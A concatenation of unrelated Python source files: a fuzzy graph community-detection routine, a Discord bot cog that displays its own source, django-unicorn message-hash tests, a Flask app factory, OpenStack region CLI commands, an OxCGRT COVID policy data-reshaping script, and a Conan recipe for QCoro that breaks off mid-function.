                if visited[j] == 0 and index != j:
                    if fuzz_d[theta_cores[index]][theta_cores[j]] > 0:
                        visited[j] = 1
                        reach.append(j)
                        flag = True
        index += 1
    return np.array(reach)
def __gran_embed(core, c, fuzz_d):
    """Return the normalized granular embeddedness of *core* with community *c*.

    Computed as sum-of-column-minima over sum-of-column-maxima of the
    membership rows belonging to the community plus the candidate core.
    """
    members = np.append(np.array(c), core)
    numerator = 0
    denominator = 0
    for col in range(len(fuzz_d[0])):
        column = fuzz_d[members, col]
        numerator += np.min(column)
        denominator += np.max(column)
    return float(numerator) / denominator
def fuzzy_comm(graph, theta, eps, r):
    """Detect fuzzy communities via theta-core expansion.

    Takes adjacency_mat(n*n), theta, eps (epsilon), and radius(r) and
    returns the communities plus a fuzzy membership of every node in every
    community.

    :param graph: networkx graph
    :param theta: minimum column mass for a vertex to qualify as a theta-core
    :param eps: granular-embeddedness threshold for joining a community
    :param r: maximum shortest-path distance contributing to membership
    :return: (list of communities as lists of node ids,
              dict node -> {community index: association weight})
    """
    # NOTE(review): nx.to_numpy_matrix is deprecated/removed in newer
    # networkx releases — confirm the pinned version still provides it.
    adjacency_mat = nx.to_numpy_matrix(graph)
    theta_cores = []
    num_vertices = adjacency_mat.shape[0]
    # Fuzzy granule initialization
    # gran = [i for i in range(num_vertices)]
    # Calculate distance between all vertices
    dist = list(nx.all_pairs_shortest_path_length(graph))
    # Membership values between all nodes: 1/(1+d) for nodes within radius r.
    fuzz_d = np.zeros(shape=adjacency_mat.shape).astype(float)
    for i in range(num_vertices):
        nid, n_dist = dist[i]
        for j in graph.nodes():
            if j in n_dist and n_dist[j] <= r:
                fuzz_d[nid][j] = 1 / float(1 + n_dist[j])
    _sum = np.sum(fuzz_d, axis=1)
    # Normalization of Membership: each row sums to 1.
    for i in range(num_vertices):
        fuzz_d[i] = fuzz_d[i] / float(_sum[i])
    # Theta-cores Finding: vertices whose incoming membership mass >= theta.
    for i in range(num_vertices):
        if np.sum(fuzz_d[:, i]) >= theta:
            theta_cores.append(i)
    theta_cores = np.array(theta_cores)
    num_cores = len(theta_cores)
    # Re-normalize rows over the core columns only; k mirrors i here.
    _sum = np.sum(fuzz_d[:, theta_cores], axis=1)
    k = 0
    for i in range(num_vertices):
        fuzz_d[i] = fuzz_d[i] / _sum[k]
        k += 1
    # Finding Fuzzy Communities: grow each unvisited core by reachable cores
    # whose granular embeddedness with the community exceeds eps.
    communities = []
    visited = np.zeros(num_cores)
    for i in range(num_cores):
        if visited[i] == 0:
            c = [theta_cores[i]]
            visited[i] = 1
            reach = __reachable(i, theta_cores, fuzz_d, visited.copy())
            for core_ind in reach:
                if __gran_embed(theta_cores[core_ind], c, fuzz_d) > eps:
                    c.append(theta_cores[core_ind])
                    visited[core_ind] = 1
            communities.append(c)
    # Convert numpy ints to plain ints for the public return value.
    cms = []
    for c in communities:
        cms.append([int(n) for n in c])
    # fuzzy association to communities: row mass of each node over the
    # members of each community.
    fuzz_assoc = defaultdict(dict)
    for i in range(num_vertices):
        for j in range(len(cms)):
            fuzz_assoc[i][j] = np.sum(fuzz_d[i, cms[j]])
    return cms, fuzz_assoc
|
import logging
import os
from dataclasses import dataclass
from threading import Event
from typing import List
import discord
import discord.ext.commands as commands
from bot.consts import Colors
from bot.bot_secrets import BotSecrets
import bot.extensions as ext
from bot.consts import Colors
from bot.messaging.events import Events
from bot.utils.displayable_path import DisplayablePath
log = logging.getLogger(__name__)
@dataclass
class FilePaths:
    """Absolute and repository-relative paths of one bot source file."""
    # Full filesystem path to the file.
    absolute: str
    # Path of the file relative to the repository root directory.
    relative: str
class SourceCodeCog(commands.Cog):
    """
    A cog to allow the bot to print its own source code given a file name
    """

    def __init__(self, bot) -> None:
        self.bot = bot
        # Maps a bare file name to its absolute and repo-relative paths.
        self.bot_files = {}
        # Folders/files that must never be exposed through these commands.
        self.ignored = ['Logs', 'venv', '__pycache__', 'database', '.git', '.pytest_cache', 'bot_env.env']
        self.repo_url = BotSecrets.get_instance().github_url

        root = os.getcwd()
        # Name of the repository root folder, used to derive repo-relative
        # paths (os.path.basename works on every platform, unlike the old
        # split('/') which broke on Windows).
        root_dir = os.path.basename(root)
        for root, dirs, files in os.walk(root, topdown=True):
            # Prune hidden directories in place so os.walk never descends into them.
            dirs[:] = [d for d in dirs if not d.startswith('.')]
            if not any(folder in f'{root}/' for folder in self.ignored):
                for f in files:
                    path = os.path.join(root, f)
                    self.bot_files[f] = FilePaths(path, path.split(root_dir)[1])

    @ext.group(case_insensitive=True, invoke_without_command=True)
    @ext.long_help(
        """
        Links the bots repository or optionally a specific file within the bots source tree
        """
    )
    @ext.short_help('Links the bots source repo')
    @ext.example(('source', 'source clem_bot.py'))
    async def source(self, ctx, file: str = None):
        # With no argument, link the whole repository.
        if not file:
            embed = discord.Embed(title='Heres my source repository',
                                  color=Colors.ClemsonOrange,
                                  description=f'Feel free to contribute :grin:')
            embed.add_field(name='Link', value=f'[Source]({self.repo_url})')
            embed.set_thumbnail(url='https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png')
            await ctx.send(embed=embed)
            return

        try:
            relative_url = self.bot_files[file].relative
        except KeyError:
            # Previously an unknown file name escaped as an uncaught KeyError.
            embed = discord.Embed(title=f'Error: File {file} not found', color=Colors.Error)
            await ctx.send(embed=embed)
            return

        gh_url = f'{self.repo_url}/tree/master{relative_url}'
        embed = discord.Embed(title=f'Heres the source for {file}',
                              color=Colors.ClemsonOrange,
                              description=f'Feel free to contribute :grin:')
        embed.add_field(name='Link', value=f'[Source]({gh_url})')
        embed.set_thumbnail(url='https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png')
        await ctx.send(embed=embed)

    @source.command(aliases=['directory', 'tree'])
    @ext.long_help(
        """
        Prints out the bots full source directory structure in discord, you may use this to know what
        files the source command has access too
        """
    )
    @ext.short_help('Prints the source directory')
    @ext.example('source list')
    async def list(self, ctx):
        # Render the walked source tree and send it in discord-sized chunks.
        file_tree = self.list_files(os.getcwd(), self.ignored)
        sent_messages = []
        for chunk in self.chunk_iterable(file_tree, 1980):
            sent_messages.append(await ctx.send(f'```yaml\n{chunk}```'))
        await self.bot.messenger.publish(Events.on_set_deletable,
                                         msg=sent_messages,
                                         author=ctx.author)

    @source.command(aliases=['show'])
    @ext.long_help(
        'Prints the contents of a specified source file directly into discord, optionally allows you to specify the start and'
        'ending line numbers to narrow down what you display, if you only provide one number the'
        'command will print from that number to the end of the file'
    )
    @ext.short_help('Displays a source file directly in discord')
    @ext.example(('source print __main__.py', 'source print __main__.py 10 20'))
    async def print(self, ctx, file: str = None, line_start: int = None, line_stop: int = None):
        # Guard: invoking `source print` with no file used to crash with an
        # AttributeError on file.replace().
        if file is None:
            embed = discord.Embed(title=f'Error: No file specified', color=Colors.Error)
            await ctx.send(embed=embed)
            return

        # Sanitize BEFORE the restricted check; the old order allowed e.g.
        # 'BotSecrets\.json' to slip past the check and then be normalized
        # into the restricted name.
        file = file.replace('\\', '').replace('`', '')

        if file == 'BotSecrets.json' or file == 'bot_env.env':
            embed = discord.Embed(title=f'Error: Restricted access', color=Colors.Error)
            await ctx.send(embed=embed)
            return

        if line_start is not None and line_stop is not None:
            if line_start >= line_stop:
                embed = discord.Embed(title=f'Error: Line numbers are invalid', color=Colors.Error)
                await ctx.send(embed=embed)
                return

        # Open the file once; the old code opened it twice and never closed
        # the first probe handle.
        try:
            with open(self.bot_files[file].absolute) as f:
                source = f.read()
        except (FileNotFoundError, KeyError):
            embed = discord.Embed(title=f'Error: File {file} not found', color=Colors.Error)
            await ctx.send(embed=embed)
            return

        if not source:
            return

        if line_stop is not None and len(source.splitlines()) < line_stop:
            embed = discord.Embed(title=f'Error: End line number too high', color=Colors.Error)
            await ctx.send(embed=embed)
            return

        formatted_source = self.process_source(source, line_start, line_stop)

        total_chars = 0
        source_with_length = []
        # This creates a list of tuples (str, int) where the [1] index is the
        # total character length of the source thus far.
        for line in formatted_source:
            total_chars = total_chars + len(line)
            source_with_length.append((line, total_chars))

        # Walk the length list and break it into chunks based on the running
        # character total, so each message stays under discord's limit.
        break_point_increment = 1800
        break_point = break_point_increment
        chunks_to_send = []
        temp_list = []
        for _, value in enumerate(source_with_length):
            if value[1] < break_point:
                # We havent reached the message char limit, keep going.
                temp_list.append(value[0])
            else:
                # We hit the limit, stop and append to the chunk list.
                chunks_to_send.append('\n'.join(temp_list))
                # Clear the temp list and append the current line in the new
                # chunk so we dont lose it.
                temp_list.clear()
                temp_list.append(value[0])
                # Increment the breakpoint so we know where the next chunk should end.
                break_point += break_point_increment
        # We enumerated over the whole list, append whats left to the chunks to send.
        chunks_to_send.append('\n'.join(temp_list))

        # Loop over the chunks and send them one by one with correct python formatting.
        sent_messages = []
        for chunk in chunks_to_send:
            backslash = '\\'
            msg = await ctx.send(f"```py\n{chunk.replace('`', f'{backslash}`')}```")
            sent_messages.append(msg)

        await self.bot.messenger.publish(Events.on_set_deletable, msg=sent_messages, author=ctx.author)

    def chunk_iterable(self, iterable, chunk_size):
        """Yield successive chunk_size-length slices of iterable."""
        for i in range(0, len(iterable), chunk_size):
            yield iterable[i:i + chunk_size]

    def process_source(self, source: str, line_start: int = None, line_stop: int = None):
        """Number every line and slice out the requested line range."""
        split_source = [f'{i+1:03d} | {value}' for i, value in enumerate(source.splitlines())]

        if line_start and line_start <= 0:
            line_start = 1

        # Slice bound is the line count (the old code used len(source), the
        # character count, which only worked because slices clamp).
        filtered_source = split_source[line_start - 1 if line_start else 0: line_stop or len(split_source)]
        return filtered_source

    def list_files(self, startpath, to_ignore: List[str]) -> str:
        """Build a displayable tree of startpath, skipping ignored folders."""
        paths = DisplayablePath.get_tree(startpath, criteria=
            lambda s: not any(i in s.parts for i in to_ignore))
        return paths
def setup(bot):
    """discord.py extension entry point: register this cog on the bot."""
    bot.add_cog(SourceCodeCog(bot))
|
import shortuuid
from django_unicorn.utils import generate_checksum
from tests.views.fake_components import FakeComponent
from tests.views.message.test_calls import FakeCallsComponent
from tests.views.message.utils import post_and_get_response
def test_message_hash_no_change(client):
    """A call whose re-rendered output matches the client checksum yields 304."""
    component_id = shortuuid.uuid()[:8]
    component = FakeComponent(
        component_id=component_id,
        component_name="tests.views.fake_components.FakeComponent",
    )
    # Named `checksum` rather than `hash` to avoid shadowing the builtin.
    checksum = generate_checksum(component.render())

    data = {"method_count": 0}
    response = post_and_get_response(
        client,
        url="/message/tests.views.fake_components.FakeComponent",
        data=data,
        action_queue=[
            {
                "payload": {"name": "test_method_kwargs(count=0)"},
                "type": "callMethod",
            }
        ],
        component_id=component_id,
        hash=checksum,
    )

    assert response.status_code == 304
def test_message_hash_changes(client):
    """A call that mutates state returns the updated data, not a 304."""
    component_id = shortuuid.uuid()[:8]
    component = FakeComponent(
        component_id=component_id,
        component_name="tests.views.fake_components.FakeComponent",
    )
    # Named `checksum` rather than `hash` to avoid shadowing the builtin.
    checksum = generate_checksum(component.render())

    data = {"method_count": 0}
    response = post_and_get_response(
        client,
        url="/message/tests.views.fake_components.FakeComponent",
        data=data,
        action_queue=[
            {
                "payload": {"name": "test_method_kwargs(count=1)"},
                "type": "callMethod",
            }
        ],
        component_id=component_id,
        hash=checksum,
    )

    assert response["data"]["method_count"] == 1
def test_message_hash_no_change_but_return_value(client):
    """Unchanged output with a method return value still yields full JSON."""
    component_id = shortuuid.uuid()[:8]
    component = FakeComponent(
        component_id=component_id,
        component_name="tests.views.fake_components.FakeComponent",
    )
    # Named `checksum` rather than `hash` to avoid shadowing the builtin.
    checksum = generate_checksum(component.render())

    data = {"method_count": 0}
    response = post_and_get_response(
        client,
        url="/message/tests.views.fake_components.FakeComponent",
        data=data,
        action_queue=[
            {
                "payload": {"name": "test_return_value"},
                "type": "callMethod",
            }
        ],
        component_id=component_id,
        hash=checksum,
    )

    # check that the response is JSON and not a 304
    assert isinstance(response, dict)
    assert response["return"]["value"]
def test_message_hash_no_change_but_return_redirect(client):
    """Unchanged output with a redirect return still yields full JSON."""
    component_id = shortuuid.uuid()[:8]
    component = FakeComponent(
        component_id=component_id,
        component_name="tests.views.fake_components.FakeComponent",
    )
    # Named `checksum` rather than `hash` to avoid shadowing the builtin.
    checksum = generate_checksum(component.render())

    data = {"method_count": 0}
    response = post_and_get_response(
        client,
        url="/message/tests.views.fake_components.FakeComponent",
        data=data,
        action_queue=[
            {
                "payload": {"name": "test_redirect"},
                "type": "callMethod",
            }
        ],
        component_id=component_id,
        hash=checksum,
    )

    # check that the response is JSON and not a 304
    assert isinstance(response, dict)
    assert response["return"]["value"]
def test_message_hash_no_change_but_return_hash_update(client):
    """Unchanged output with a hash-update return still yields full JSON."""
    component_id = shortuuid.uuid()[:8]
    component = FakeComponent(
        component_id=component_id,
        component_name="tests.views.fake_components.FakeComponent",
    )
    # Named `checksum` rather than `hash` to avoid shadowing the builtin.
    checksum = generate_checksum(component.render())

    data = {"method_count": 0}
    response = post_and_get_response(
        client,
        url="/message/tests.views.fake_components.FakeComponent",
        data=data,
        action_queue=[
            {
                "payload": {"name": "test_hash_update"},
                "type": "callMethod",
            }
        ],
        component_id=component_id,
        hash=checksum,
    )

    # check that the response is JSON and not a 304
    assert isinstance(response, dict)
    assert response["return"]["value"]
def test_message_hash_no_change_but_return_poll_update(client):
    """Unchanged output with a poll-update return still yields full JSON."""
    component_id = shortuuid.uuid()[:8]
    component = FakeComponent(
        component_id=component_id,
        component_name="tests.views.fake_components.FakeComponent",
    )
    # Named `checksum` rather than `hash` to avoid shadowing the builtin.
    checksum = generate_checksum(component.render())

    data = {"method_count": 0}
    response = post_and_get_response(
        client,
        url="/message/tests.views.fake_components.FakeComponent",
        data=data,
        action_queue=[
            {
                "payload": {"name": "test_poll_update"},
                "type": "callMethod",
            }
        ],
        component_id=component_id,
        hash=checksum,
    )

    # check that the response is JSON and not a 304
    assert isinstance(response, dict)
    assert response["return"]["value"]
def test_message_hash_no_change_but_return_location_update(client):
    """Unchanged output with a refresh-redirect return still yields full JSON."""
    component_id = shortuuid.uuid()[:8]
    component = FakeComponent(
        component_id=component_id,
        component_name="tests.views.fake_components.FakeComponent",
    )
    # Named `checksum` rather than `hash` to avoid shadowing the builtin.
    checksum = generate_checksum(component.render())

    data = {"method_count": 0}
    response = post_and_get_response(
        client,
        url="/message/tests.views.fake_components.FakeComponent",
        data=data,
        action_queue=[
            {
                "payload": {"name": "test_refresh_redirect"},
                "type": "callMethod",
            }
        ],
        component_id=component_id,
        hash=checksum,
    )

    # check that the response is JSON and not a 304
    assert isinstance(response, dict)
    assert response["return"]["value"]
def test_message_hash_no_change_but_calls(client):
    """Unchanged output with queued JS calls still yields full JSON."""
    component_id = shortuuid.uuid()[:8]
    component = FakeCallsComponent(
        component_id=component_id,
        component_name="tests.views.message.test_calls.FakeCallsComponent",
    )
    # Named `checksum` rather than `hash` to avoid shadowing the builtin.
    checksum = generate_checksum(component.render())

    data = {}
    response = post_and_get_response(
        client,
        url="/message/tests.views.message.test_calls.FakeCallsComponent",
        data=data,
        action_queue=[
            {
                "payload": {"name": "test_call"},
                "type": "callMethod",
            }
        ],
        component_id=component_id,
        hash=checksum,
    )

    # check that the response is JSON and not a 304
    assert isinstance(response, dict)
    assert response.get("calls") == [{"args": [], "fn": "testCall"}]
|
# Copyright [2020] [Two Six Labs, LLC]
# Licensed under the Apache License, Version 2.0
import importlib
import os
from types import MappingProxyType
from flask import Flask
from sqlalchemy.engine.url import URL
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy import create_engine
from flask_sqlalchemy import SQLAlchemy
from controller import create_labels_for_available_pages, make_pages_dict
from utility.constants import (
APP_CONFIG_JSON,
AVAILABLE_PAGES,
CONFIG_FILE_FOLDER,
AVAILABLE_PAGES_DICT,
DATA_BACKEND,
POSTGRES,
SQLALCHEMY_DATABASE_URI,
DEVELOPMENT,
)
from app_deploy_data.app_settings import DATABASE_CONFIG
from version import VERSION
from views.dashboard import dashboard_blueprint
from views.file_upload import upload_blueprint
from views.admin import admin_blueprint
from views.download import download_blueprint
from views.wizard_view import wizard_blueprint
def create_app(db_uri=None):
    """Flask application factory.

    :param db_uri: optional database location — either a sqlalchemy URL
        object or a string; when omitted, the URL is built from the
        deployment's DATABASE_CONFIG.
    :return: Flask app with all blueprints registered
    :raises TypeError: if db_uri is neither a URL object nor a string
    """
    app = Flask(__name__)
    # specify the env variable DATABASE_CONFIG to control the content of DATABASE_CONFIG
    if db_uri:
        if isinstance(db_uri, URL):
            sqlalchemy_database_uri = db_uri
        elif isinstance(db_uri, str):
            # NOTE(review): URL(<string>) treats the string as a drivername;
            # a full URI string is normally parsed with sqlalchemy's
            # make_url() — confirm this branch is exercised and correct.
            sqlalchemy_database_uri = URL(db_uri)
        else:
            raise TypeError("db_uri must be url string or sqlalchemy URL object")
    else:
        sqlalchemy_database_uri = URL(**DATABASE_CONFIG)
    app.config.from_mapping(
        SQLALCHEMY_DATABASE_URI=sqlalchemy_database_uri,
        SQLALCHEMY_TRACK_MODIFICATIONS=False,
        VERSION=VERSION,
    )
    # register url blueprints with the app object
    app.register_blueprint(dashboard_blueprint)
    app.register_blueprint(upload_blueprint)
    app.register_blueprint(admin_blueprint)
    app.register_blueprint(download_blueprint)
    if app.config.get("ENV") == DEVELOPMENT:
        # only include the wizard blueprint when running in debug mode
        app.register_blueprint(wizard_blueprint)

    @app.context_processor
    def get_dashboard_pages():
        # used for the navigation bar
        available_pages = app.config.get(APP_CONFIG_JSON).get(AVAILABLE_PAGES, [])
        dashboard_pages = create_labels_for_available_pages(available_pages)
        return dict(dashboard_pages=dashboard_pages)

    return app
def configure_app(app, config_dict, config_file_folder):
    """Attach the app config and the available-pages dict to the Flask app.

    :param app: Flask app created by create_app()
    :param config_dict: parsed application config (json)
    :param config_file_folder: folder holding the per-page config files
    :return: the same app, fully configured
    """
    # Store a read-only proxy so the runtime cannot mutate the app config.
    app.config[APP_CONFIG_JSON] = MappingProxyType(config_dict)
    # (Removed a no-op self-assignment of config_file_folder here.)
    app.config[CONFIG_FILE_FOLDER] = config_file_folder
    app.config[AVAILABLE_PAGES_DICT] = make_pages_dict(
        config_dict.get(AVAILABLE_PAGES, []), app.config[CONFIG_FILE_FOLDER]
    )
    configure_backend(app)
    return app
def configure_backend(app, models_path="app_deploy_data.models"):
    """Wire the data-backend handler classes onto the Flask app config.

    :param app: Flask app whose APP_CONFIG_JSON selects the backend
    :param models_path: dotted import path of the SQLAlchemy models module
    """
    # setup steps unique to SQL-backended apps
    if app.config[APP_CONFIG_JSON].get(DATA_BACKEND) in [POSTGRES]:
        from database.sql_handler import SqlHandler, SqlDataInventory

        app.db = SQLAlchemy()
        # NOTE(review): convert_unicode was removed in SQLAlchemy 1.4 —
        # confirm the pinned SQLAlchemy version still accepts it.
        engine = create_engine(
            app.config[SQLALCHEMY_DATABASE_URI], convert_unicode=True
        )
        app.db_session = scoped_session(
            sessionmaker(autocommit=False, autoflush=False, bind=engine)
        )
        app.db.init_app(app)
        data_backend_class = SqlHandler
        data_backend_writer = SqlDataInventory
        models_imports = importlib.import_module(models_path)
        app.Base = getattr(models_imports, "Base")

        @app.teardown_appcontext
        def shutdown_session(exception=None):
            # Return the scoped session to the pool after every request.
            app.db_session.remove()
    else:
        # Default: CSV files on local disk when no SQL backend is configured.
        from database.local_handler import LocalCSVHandler, LocalCSVDataInventory

        data_backend_class = LocalCSVHandler
        data_backend_writer = LocalCSVDataInventory
    app.config.data_handler = data_backend_class
    app.config.data_backend_writer = data_backend_writer
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Identity v3 Region action implementations"""
import logging
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
import six
from openstackclient.i18n import _
LOG = logging.getLogger(__name__)
class CreateRegion(command.ShowOne):
    _description = _("Create new region")

    def get_parser(self, prog_name):
        """Declare the region-id positional and its optional attributes."""
        parser = super(CreateRegion, self).get_parser(prog_name)
        # NOTE(stevemar): The API supports an optional region ID, but that
        # seems like poor UX, we will only support user-defined IDs.
        argument_specs = (
            (('region',),
             {'metavar': '<region-id>', 'help': _('New region ID')}),
            (('--parent-region',),
             {'metavar': '<region-id>', 'help': _('Parent region ID')}),
            (('--description',),
             {'metavar': '<description>', 'help': _('New region description')}),
        )
        for flags, options in argument_specs:
            parser.add_argument(*flags, **options)
        return parser

    def take_action(self, parsed_args):
        """Create the region and return its fields as (headers, values)."""
        identity_client = self.app.client_manager.identity
        region = identity_client.regions.create(
            id=parsed_args.region,
            parent_region=parsed_args.parent_region,
            description=parsed_args.description,
        )
        # Present the raw API keys under friendlier names, drop links.
        info = region._info
        info['region'] = info.pop('id')
        info['parent_region'] = info.pop('parent_region_id')
        info.pop('links', None)
        return zip(*sorted(six.iteritems(info)))
class DeleteRegion(command.Command):
    _description = _("Delete region(s)")

    def get_parser(self, prog_name):
        """Accept one or more region ids to delete."""
        parser = super(DeleteRegion, self).get_parser(prog_name)
        parser.add_argument(
            'region',
            metavar='<region-id>',
            nargs='+',
            help=_('Region ID(s) to delete'),
        )
        return parser

    def take_action(self, parsed_args):
        """Delete every requested region, then fail if any deletion failed."""
        identity_client = self.app.client_manager.identity
        failures = 0
        for region_id in parsed_args.region:
            try:
                identity_client.regions.delete(region_id)
            except Exception as e:
                # Keep going so one bad id does not block the rest.
                failures += 1
                LOG.error(_("Failed to delete region with "
                            "ID '%(region)s': %(e)s"), {'region': region_id, 'e': e})
        if failures:
            total = len(parsed_args.region)
            msg = (_("%(result)s of %(total)s regions failed "
                     "to delete.") % {'result': failures, 'total': total})
            raise exceptions.CommandError(msg)
class ListRegion(command.Lister):
    _description = _("List regions")

    def get_parser(self, prog_name):
        """Allow filtering the listing by parent region."""
        parser = super(ListRegion, self).get_parser(prog_name)
        parser.add_argument(
            '--parent-region',
            metavar='<region-id>',
            help=_('Filter by parent region ID'),
        )
        return parser

    def take_action(self, parsed_args):
        """List regions, optionally filtered, as (headers, row iterator)."""
        identity_client = self.app.client_manager.identity
        filters = {}
        if parsed_args.parent_region:
            filters['parent_region_id'] = parsed_args.parent_region
        columns_headers = ('Region', 'Parent Region', 'Description')
        columns = ('ID', 'Parent Region Id', 'Description')
        regions = identity_client.regions.list(**filters)
        rows = (utils.get_item_properties(region, columns, formatters={})
                for region in regions)
        return (columns_headers, rows)
class SetRegion(command.Command):
    _description = _("Set region properties")

    def get_parser(self, prog_name):
        """Accept the region id plus the two modifiable attributes."""
        parser = super(SetRegion, self).get_parser(prog_name)
        parser.add_argument(
            'region',
            metavar='<region-id>',
            help=_('Region to modify'),
        )
        parser.add_argument(
            '--parent-region',
            metavar='<region-id>',
            help=_('New parent region ID'),
        )
        parser.add_argument(
            '--description',
            metavar='<description>',
            help=_('New region description'),
        )
        return parser

    def take_action(self, parsed_args):
        """Send only the attributes the user actually supplied."""
        identity_client = self.app.client_manager.identity
        updates = {}
        if parsed_args.description:
            updates['description'] = parsed_args.description
        if parsed_args.parent_region:
            updates['parent_region'] = parsed_args.parent_region
        identity_client.regions.update(parsed_args.region, **updates)
class ShowRegion(command.Command):
    _description = _("Display region details")

    def get_parser(self, prog_name):
        """Accept the id of the region to display."""
        parser = super(ShowRegion, self).get_parser(prog_name)
        parser.add_argument(
            'region',
            metavar='<region-id>',
            help=_('Region to display'),
        )
        return parser

    def take_action(self, parsed_args):
        """Look the region up and present its fields with friendly names."""
        identity_client = self.app.client_manager.identity
        region = utils.find_resource(identity_client.regions,
                                     parsed_args.region)
        # Rename the raw API keys for display and drop the links blob.
        info = region._info
        info['region'] = info.pop('id')
        info['parent_region'] = info.pop('parent_region_id')
        info.pop('links', None)
        return zip(*sorted(six.iteritems(info)))
|
<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 3 14:09:09 2020
@author: hamishgibbs
"""
import pandas as pd
import re
import numpy as np
#%%
# Download the latest OxCGRT policy-tracker dataset (with notes) from GitHub.
ox = pd.read_csv('https://raw.githubusercontent.com/OxCGRT/covid-policy-tracker/master/data/OxCGRT_latest_withnotes.csv')
#%%
def melt_oxcgrt(ox, drop_columns = [], sep = 'XXXXX', quick = False, quiet = True):
    """Melt the wide OxCGRT frame into long (one row per indicator/record) form.

    Each policy indicator stub (e.g. ``C1``) is collapsed into one column
    whose cells pack measure name, value, flag and notes joined by *sep*;
    the frame is then melted and the packed strings split back out.

    :param ox: raw OxCGRT DataFrame
    :param drop_columns: columns to discard before melting (only read;
        NOTE(review): the mutable default is harmless here but fragile)
    :param sep: delimiter used to pack the per-stub values — must never
        occur in the data itself
    :param quick: if True, process only the first two indicator stubs
    :param quiet: if False, print each stub name as it is processed
    :return: long DataFrame with measure/value/flag/notes plus id columns
    """
    keep_columns = list(set(ox.columns).difference(set(drop_columns)))
    ox = ox[keep_columns]
    full_value_names, value_names, stub_names = get_names(ox)
    # Columns that identify the record (country, date, ...).
    id_columns = list(set(ox.columns).difference(set(full_value_names)))
    #only use first columns for a quick run
    if quick:
        value_names = value_names[0:2]
        stub_names = stub_names[0:2]
    for i, k in enumerate(value_names):
        value_name = value_names[i]
        stub = stub_names[i]
        stub_cols = [x for x in ox.columns if stub in x]
        # Pack measure name + row values into a single delimited string.
        # NOTE(review): `ox` is a column-slice of the caller's frame here,
        # so this assignment may raise pandas' SettingWithCopyWarning.
        ox[stub] = ox.apply(lambda x: value_name + sep + sep.join([str(s) for s in x[stub_cols]]), axis=1)
        if not quiet:
            print(stub)
    ox_melted = pd.melt(ox[id_columns + stub_names], id_columns, stub_names)
    # Unpack the delimited strings back into separate columns.
    ox_expand = ox_melted['value'].str.split(sep, expand=True)
    ox_expand.columns = ['measure', 'value', 'flag', 'notes']
    ox_expand[id_columns] = ox_melted[id_columns]
    return(ox_expand)
def get_names(ox):
    """Split OxCGRT indicator columns into name groups.

    :param ox: OxCGRT DataFrame
    :return: tuple of (all indicator columns, value columns with Flag/Notes
        columns removed, indicator stubs such as 'C1')
    """
    # Indicator columns start with a letter+number prefix, e.g. 'C1_'.
    indicator_pattern = r'[A-Z][0-9]+_'
    full_value_names = [col for col in ox.columns
                        if re.findall(indicator_pattern, col) != []]
    value_names = [col for col in full_value_names
                   if 'Flag' not in col]
    value_names = [col for col in value_names
                   if 'Notes' not in col]
    stub_names = [col.split('_')[0] for col in value_names]
    return(full_value_names, value_names, stub_names)
#%%
# Aggregate index columns that are not individual policy indicators;
# excluded before melting.
drop_columns = ['ConfirmedCases',
                'ConfirmedDeaths', 'StringencyIndex', 'StringencyIndexForDisplay',
                'StringencyLegacyIndex', 'StringencyLegacyIndexForDisplay',
                'GovernmentResponseIndex', 'GovernmentResponseIndexForDisplay',
                'ContainmentHealthIndex', 'ContainmentHealthIndexForDisplay',
                'EconomicSupportIndex', 'EconomicSupportIndexForDisplay']
#%%
ox_melted = melt_oxcgrt(ox, drop_columns, quick = True, quiet = False)
#%%
# NOTE(review): the cells below are interactive scratch work — they read
# value_names / stub_names, which exist only as locals inside melt_oxcgrt,
# so running this file top-to-bottom as a script raises NameError.
sep = 'XXXXX'
for i, k in enumerate(value_names[0:2]):
    value_name = value_names[i]
    stub = stub_names[i]
    stub_cols = [x for x in ox.columns if stub in x]
    ox[stub] = ox.apply(lambda x: value_name + sep + sep.join([str(s) for s in x[stub_cols]]), axis=1)
    print(i)
#%%
ox_melted = pd.melt(ox[['Date'] + stub_names[0:2]], 'Date', stub_names[0:2])
#%%
# Unpack the delimited value strings into separate columns.
v = ox_melted['value'].str.split(sep, expand=True)
v.columns = ['measure', 'value', 'flag', 'notes']
v['Date'] = ox_melted['Date']
<reponame>kokounet/conan-center-index
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
import os
required_conan_version = ">=1.33.0"
class QCoroConan(ConanFile):
    """Conan recipe packaging QCoro, C++ coroutine support for Qt."""
    name = "qcoro"
    license = "MIT"
    homepage = "https://github.com/danvratil/qcoro"
    url = "https://github.com/conan-io/conan-center-index"
    description = "C++ Coroutines for Qt."
    topics = ("coroutines", "qt")
    settings = "os", "compiler", "build_type", "arch"
    # User-selectable build options and their defaults.
    options = {
        "shared": [True, False],
        "fPIC": [True, False],
        "asan": [True, False],  # AddressSanitizer instrumentation
    }
    default_options = {
        "shared": False,
        "fPIC": True,
        "asan": False,
    }
    generators = "cmake", "cmake_find_package_multi"
    exports_sources = ["CMakeLists.txt"]
    # CMake helper built lazily and cached by _configure_cmake().
    _cmake = None
    @property
    def _source_subfolder(self):
        # Folder the upstream sources are extracted into.
        return "source_subfolder"

    @property
    def _build_subfolder(self):
        # Out-of-source build folder used by CMake.
        return "build_subfolder"
@property
def _compilers_minimum_version(self):
minimum_versions = {
"gcc": "10",
"Visual Studio": "17",
"msvc": "19.29",
"clang": "8",
"apple-clang": "13"
}
return minimum_versions
    def config_options(self):
        # fPIC is meaningless on Windows; drop the option there.
        if self.settings.os == "Windows":
            del self.options.fPIC

    def configure(self):
        # Shared builds are always position independent, so fPIC is moot.
        if self.options.shared:
            del self.options.fPIC

    def build_requirements(self):
        self.build_requires("cmake/3.21.3")

    def requirements(self):
        self.requires("qt/6.2.2")
        # NOTE(review): the expat override pins a transitive Qt dependency —
        # confirm it is still needed when bumping the qt reference.
        self.requires("expat/2.4.2", override=True)
def validate(self):
if self.settings.compiler.cppstd:
tools.check_min_cppstd(self, 20)
def lazy_lt_semver(v1, v2):
lv1 = [int(v) for v in v1.split(".")]
